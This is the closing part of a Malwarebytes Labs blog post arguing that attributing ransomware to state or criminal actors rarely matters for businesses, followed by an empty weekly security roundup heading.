While the Analyst1 report contains some interesting findings, we agree that it doesn’t deliver a smoking gun. That doesn’t mean there isn’t a smoking gun, somewhere, of course. But even if there is, unless you’re an intelligence agency like the NSA, establishing the intent of a potential attacker can be a waste of time and effort.

Does that mean you shouldn’t care about attribution at all? No. It’s sensible to update your threat model in response to tactics used by real-world threat actors. But it often doesn’t matter who is doing the attacking. Ransomware is a well-established and well-resourced threat to your business, whether it’s state-funded or run by criminal gangs living off several years of multi-million dollar payouts and a Bitcoin boom.

You can read more about attribution in our two part series on the subject, starting with when you should care.

The post Analysts “strongly believe” the Russian state colludes with ransomware gangs appeared first on Malwarebytes Labs.

A week in security (August 9 – August 15)

Last week on Malwarebytes Labs:

Other cybersecurity news:

Stay safe, everyone!

The post A week in security (August 9 – August 15) appeared first on Malwarebytes Labs.